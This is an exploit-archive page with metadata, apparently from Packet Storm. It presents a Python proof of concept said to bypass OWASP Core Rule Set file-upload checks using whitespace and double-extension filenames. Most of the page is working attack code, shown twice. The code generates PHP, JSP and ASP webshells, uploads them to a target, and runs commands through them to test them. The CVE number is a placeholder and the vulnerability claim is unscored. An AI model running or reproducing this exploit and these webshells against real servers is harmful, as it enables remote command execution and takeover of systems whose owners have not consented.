📄 OWASP CRS 3.3.9 / 4.25.x LTS / 4.8.x File...

Description

This proof of concept demonstrating a weakness in some web applications protected by OWASP Core Rule Set CRS or similar filters, where file upload validation can be bypassed using ambiguous filename formatting...

Visit Original Source

Basic Information

ID PACKETSTORM:219846

Published Apr 27, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : OWASP CRS 3.3.9, 4.25.x LTS, and 4.8.x. File Upload Bypass via Filename Whitespace / Extension Parsing Weakness |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://owasp.org/ |
==================================================================================================================================

[+] Summary : a weakness in some web applications protected by OWASP Core Rule Set (CRS) or similar filters, where file upload validation can be bypassed using ambiguous filename formatting.

[+] POC :

#!/usr/bin/env python3

import requests
import sys
import argparse
import os
from urllib.parse import urljoin

class CRSBypassExploit:
def __init__(self, target_url, upload_endpoint, verbose=False):
self.target_url = target_url.rstrip('/')
self.upload_endpoint = upload_endpoint
self.verbose = verbose
self.session = requests.Session()

def log(self, message, level="INFO"):
if self.verbose or level == "ERROR":
colors = {
"INFO": "\033[94m",
"SUCCESS": "\033[92m",
"ERROR": "\033[91m",
"WARNING": "\033[93m"
}
print(f"{colors.get(level, '')}[{level}] {message}\033[0m")

def generate_webshell_php(self, cmd_param="cmd"):
return f"""<?php
if (isset($_REQUEST['{cmd_param}'])) {{
$cmd = $_REQUEST['{cmd_param}'];
echo "<pre>" . shell_exec($cmd) . "</pre>";
}} else {{
echo "Webshell loaded. Use ?{cmd_param}=command";
}}
?>"""

def generate_webshell_jsp(self, cmd_param="cmd"):
return f"""<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("{cmd_param}");
if (cmd != null) {{
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {{
out.println(line);
}}
}}
%>"""

def generate_webshell_asp(self, cmd_param="cmd"):
return f"""<%
Dim cmd
cmd = Request("{cmd_param}")
If cmd <> "" Then
CreateObject("WScript.Shell").Run cmd, 0, True
End If
%>"""

def upload_file(self, file_content, original_filename, extension, whitespace_position="before"):
if whitespace_position == "before":
filename = f"{original_filename}. {extension}"
elif whitespace_position == "after":
filename = f"{original_filename}.{extension} "
elif whitespace_position == "both":
filename = f"{original_filename}. {extension} "
elif whitespace_position == "double":
filename = f"{original_filename}.{extension} "
else:
filename = f"{original_filename}.{extension}"

files = {
'file': (filename, file_content,
'application/x-httpd-php' if extension == 'php' else 'application/x-jsp')
}

try:
url = urljoin(self.target_url, self.upload_endpoint)
response = self.session.post(url, files=files)

self.log(f"Uploaded: {filename}", "INFO")
self.log(f"Response status: {response.status_code}", "INFO")

return {
'success': response.status_code < 400,
'filename': filename,
'response': response.text,
'status_code': response.status_code
}
except Exception as e:
self.log(f"Upload failed: {e}", "ERROR")
return None

def exploit_php(self, original_filename="shell"):
self.log("Attempting PHP webshell upload...", "INFO")
content = self.generate_webshell_php()
patterns = ['before', 'after', 'both', 'double']

for pattern in patterns:
self.log(f"Trying pattern: {pattern}", "INFO")
result = self.upload_file(content, original_filename, "php", pattern)

if result and result['success']:
self.log(f"SUCCESS! Uploaded with pattern: {pattern}", "SUCCESS")
return result

self.log("All PHP patterns failed", "WARNING")
return None

def exploit_jsp(self, original_filename="shell"):
self.log("Attempting JSP webshell upload...", "INFO")
content = self.generate_webshell_jsp()
patterns = ['before', 'after', 'both', 'double']

for pattern in patterns:
self.log(f"Trying pattern: {pattern}", "INFO")
result = self.upload_file(content, original_filename, "jsp", pattern)

if result and result['success']:
self.log(f"SUCCESS! Uploaded with pattern: {pattern}", "SUCCESS")
return result

self.log("All JSP patterns failed", "WARNING")
return None

def test_webshell(self, upload_path, cmd="whoami"):
try:
url = urljoin(self.target_url, upload_path)
response = self.session.get(url, params={'cmd': cmd})

if response.status_code == 200 and response.text:
self.log(f"Webshell working! Command output: {response.text[:200]}", "SUCCESS")
return True
else:
self.log("Webshell test failed", "WARNING")
return False
except Exception as e:
self.log(f"Test failed: {e}", "ERROR")
return False

def exploit_double_extension(self):
self.log("Attempting double-extension bypass...", "INFO")

content = self.generate_webshell_php()
filename = "shell. php.jpg"

files = {
'file': (filename, content, 'image/jpeg')
}

try:
url = urljoin(self.target_url, self.upload_endpoint)
response = self.session.post(url, files=files)

if response.status_code < 400:
self.log(f"Double-extension upload successful: {filename}", "SUCCESS")
return {
'success': True,
'filename': filename,
'status_code': response.status_code
}
else:
self.log("Double-extension upload failed", "WARNING")
return None
except Exception as e:
self.log(f"Double-extension upload failed: {e}", "ERROR")
return None

def main():
parser = argparse.ArgumentParser(description='OWASP CRS Bypass Exploit - File Upload with Whitespace Padding')
parser.add_argument('-u', '--url', required=True)
parser.add_argument('-e', '--endpoint', default='/upload')
parser.add_argument('-t', '--type', choices=['php', 'jsp', 'both'], default='both')
parser.add_argument('-v', '--verbose', action='store_true')
parser.add_argument('-c', '--command', default='whoami')

args = parser.parse_args()

print("=" * 60)
print("OWASP CRS Bypass Exploit - CVE-2025-XXXXX")
print("=" * 60)

exploit = CRSBypassExploit(args.url, args.endpoint, args.verbose)
results = []

if args.type in ['php', 'both']:
result = exploit.exploit_php()
if result:
results.append(('PHP', result))

if args.type in ['jsp', 'both']:
result = exploit.exploit_jsp()
if result:
results.append(('JSP', result))

double_result = exploit.exploit_double_extension()
if double_result:
results.append(('Double Extension', double_result))

if results:
print("\n" + "=" * 60)
print("EXPLOITATION SUMMARY")
print("=" * 60)

for exploit_type, result in results:
print(f"\n[+] {exploit_type} exploit successful!")
print(f" Filename: {result.get('filename')}")
print(f" Status: {result.get('status_code', 'N/A')}")

print(f"\n[*] Testing webshell with command: {args.command}")
exploit.test_webshell(result.get('filename'), args.command)
else:
print("\n[-] Exploitation failed!")

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-27T16:33:10",
    "description": "This proof of concept demonstrating a weakness in some web applications protected by OWASP Core Rule Set CRS or similar filters, where file upload validation can be bypassed using ambiguous filename formatting...",
    "published": "2026-04-27T00:00:00",
    "modified": "2026-04-27T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 OWASP CRS 3.3.9 / 4.25.x LTS / 4.8.x File Upload Bypass",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219846",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "==================================================================================================================================\n    | # Title     : OWASP CRS 3.3.9, 4.25.x LTS, and 4.8.x. File Upload Bypass via Filename Whitespace / Extension Parsing Weakness  |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://owasp.org/                                                                                               |\n    ==================================================================================================================================\n    \n    [+] Summary    : a weakness in some web applications protected by OWASP Core Rule Set (CRS) or similar filters, where file upload validation can be bypassed using ambiguous filename formatting.\n    \n    [+] POC        :  \n    \n    #!/usr/bin/env python3\n    \n    import requests\n    import sys\n    import argparse\n    import os\n    from urllib.parse import urljoin\n    \n    class CRSBypassExploit:\n        def __init__(self, target_url, upload_endpoint, verbose=False):\n            self.target_url = target_url.rstrip('/')\n            self.upload_endpoint = upload_endpoint\n            self.verbose = verbose\n            self.session = requests.Session()\n            \n        def log(self, message, level=\"INFO\"):\n            if self.verbose or level == \"ERROR\":\n                colors = {\n                    \"INFO\": \"\\033[94m\",\n                    \"SUCCESS\": \"\\033[92m\",\n                    \"ERROR\": \"\\033[91m\",\n                    \"WARNING\": \"\\033[93m\"\n                }\n                print(f\"{colors.get(level, '')}[{level}] {message}\\033[0m\")\n        \n        def generate_webshell_php(self, cmd_param=\"cmd\"):\n            return f\"\"\"<?php\n    if (isset($_REQUEST['{cmd_param}'])) {{\n        $cmd = $_REQUEST['{cmd_param}'];\n        echo \"<pre>\" . shell_exec($cmd) . \"</pre>\";\n    }} else {{\n        echo \"Webshell loaded. Use ?{cmd_param}=command\";\n    }}\n    ?>\"\"\"\n        \n        def generate_webshell_jsp(self, cmd_param=\"cmd\"):\n            return f\"\"\"<%@ page import=\"java.io.*\" %>\n    <%\n    String cmd = request.getParameter(\"{cmd_param}\");\n    if (cmd != null) {{\n        Process p = Runtime.getRuntime().exec(cmd);\n        BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));\n        String line;\n        while ((line = reader.readLine()) != null) {{\n            out.println(line);\n        }}\n    }}\n    %>\"\"\"\n        \n        def generate_webshell_asp(self, cmd_param=\"cmd\"):\n            return f\"\"\"<%\n    Dim cmd\n    cmd = Request(\"{cmd_param}\")\n    If cmd <> \"\" Then\n        CreateObject(\"WScript.Shell\").Run cmd, 0, True\n    End If\n    %>\"\"\"\n        \n        def upload_file(self, file_content, original_filename, extension, whitespace_position=\"before\"):\n            if whitespace_position == \"before\":\n                filename = f\"{original_filename}. {extension}\"\n            elif whitespace_position == \"after\":\n                filename = f\"{original_filename}.{extension} \"\n            elif whitespace_position == \"both\":\n                filename = f\"{original_filename}. {extension} \"\n            elif whitespace_position == \"double\":\n                filename = f\"{original_filename}.{extension}  \"\n            else:\n                filename = f\"{original_filename}.{extension}\"\n            \n            files = {\n                'file': (filename, file_content,\n                         'application/x-httpd-php' if extension == 'php' else 'application/x-jsp')\n            }\n            \n            try:\n                url = urljoin(self.target_url, self.upload_endpoint)\n                response = self.session.post(url, files=files)\n                \n                self.log(f\"Uploaded: {filename}\", \"INFO\")\n                self.log(f\"Response status: {response.status_code}\", \"INFO\")\n                \n                return {\n                    'success': response.status_code < 400,\n                    'filename': filename,\n                    'response': response.text,\n                    'status_code': response.status_code\n                }\n            except Exception as e:\n                self.log(f\"Upload failed: {e}\", \"ERROR\")\n                return None\n        \n        def exploit_php(self, original_filename=\"shell\"):\n            self.log(\"Attempting PHP webshell upload...\", \"INFO\")\n            content = self.generate_webshell_php()\n            patterns = ['before', 'after', 'both', 'double']\n            \n            for pattern in patterns:\n                self.log(f\"Trying pattern: {pattern}\", \"INFO\")\n                result = self.upload_file(content, original_filename, \"php\", pattern)\n                \n                if result and result['success']:\n                    self.log(f\"SUCCESS! Uploaded with pattern: {pattern}\", \"SUCCESS\")\n                    return result\n            \n            self.log(\"All PHP patterns failed\", \"WARNING\")\n            return None\n        \n        def exploit_jsp(self, original_filename=\"shell\"):\n            self.log(\"Attempting JSP webshell upload...\", \"INFO\")\n            content = self.generate_webshell_jsp()\n            patterns = ['before', 'after', 'both', 'double']\n            \n            for pattern in patterns:\n                self.log(f\"Trying pattern: {pattern}\", \"INFO\")\n                result = self.upload_file(content, original_filename, \"jsp\", pattern)\n                \n                if result and result['success']:\n                    self.log(f\"SUCCESS! Uploaded with pattern: {pattern}\", \"SUCCESS\")\n                    return result\n            \n            self.log(\"All JSP patterns failed\", \"WARNING\")\n            return None\n        \n        def test_webshell(self, upload_path, cmd=\"whoami\"):\n            try:\n                url = urljoin(self.target_url, upload_path)\n                response = self.session.get(url, params={'cmd': cmd})\n                \n                if response.status_code == 200 and response.text:\n                    self.log(f\"Webshell working! Command output: {response.text[:200]}\", \"SUCCESS\")\n                    return True\n                else:\n                    self.log(\"Webshell test failed\", \"WARNING\")\n                    return False\n            except Exception as e:\n                self.log(f\"Test failed: {e}\", \"ERROR\")\n                return False\n        \n        def exploit_double_extension(self):\n            self.log(\"Attempting double-extension bypass...\", \"INFO\")\n            \n            content = self.generate_webshell_php()\n            filename = \"shell. php.jpg\"\n            \n            files = {\n                'file': (filename, content, 'image/jpeg')\n            }\n            \n            try:\n                url = urljoin(self.target_url, self.upload_endpoint)\n                response = self.session.post(url, files=files)\n                \n                if response.status_code < 400:\n                    self.log(f\"Double-extension upload successful: {filename}\", \"SUCCESS\")\n                    return {\n                        'success': True,\n                        'filename': filename,\n                        'status_code': response.status_code\n                    }\n                else:\n                    self.log(\"Double-extension upload failed\", \"WARNING\")\n                    return None\n            except Exception as e:\n                self.log(f\"Double-extension upload failed: {e}\", \"ERROR\")\n                return None\n    \n    \n    def main():\n        parser = argparse.ArgumentParser(description='OWASP CRS Bypass Exploit - File Upload with Whitespace Padding')\n        parser.add_argument('-u', '--url', required=True)\n        parser.add_argument('-e', '--endpoint', default='/upload')\n        parser.add_argument('-t', '--type', choices=['php', 'jsp', 'both'], default='both')\n        parser.add_argument('-v', '--verbose', action='store_true')\n        parser.add_argument('-c', '--command', default='whoami')\n        \n        args = parser.parse_args()\n        \n        print(\"=\" * 60)\n        print(\"OWASP CRS Bypass Exploit - CVE-2025-XXXXX\")\n        print(\"=\" * 60)\n        \n        exploit = CRSBypassExploit(args.url, args.endpoint, args.verbose)\n        results = []\n        \n        if args.type in ['php', 'both']:\n            result = exploit.exploit_php()\n            if result:\n                results.append(('PHP', result))\n        \n        if args.type in ['jsp', 'both']:\n            result = exploit.exploit_jsp()\n            if result:\n                results.append(('JSP', result))\n        \n        double_result = exploit.exploit_double_extension()\n        if double_result:\n            results.append(('Double Extension', double_result))\n        \n        if results:\n            print(\"\\n\" + \"=\" * 60)\n            print(\"EXPLOITATION SUMMARY\")\n            print(\"=\" * 60)\n            \n            for exploit_type, result in results:\n                print(f\"\\n[+] {exploit_type} exploit successful!\")\n                print(f\"    Filename: {result.get('filename')}\")\n                print(f\"    Status: {result.get('status_code', 'N/A')}\")\n                \n                print(f\"\\n[*] Testing webshell with command: {args.command}\")\n                exploit.test_webshell(result.get('filename'), args.command)\n        else:\n            print(\"\\n[-] Exploitation failed!\")\n    \n    \n    if __name__ == \"__main__\":\n        main()\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219846",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219846/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 OWASP CRS 3.3.9 / 4.25.x LTS / 4.8.x File Upload Bypass_PACKETSTORM:219846

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply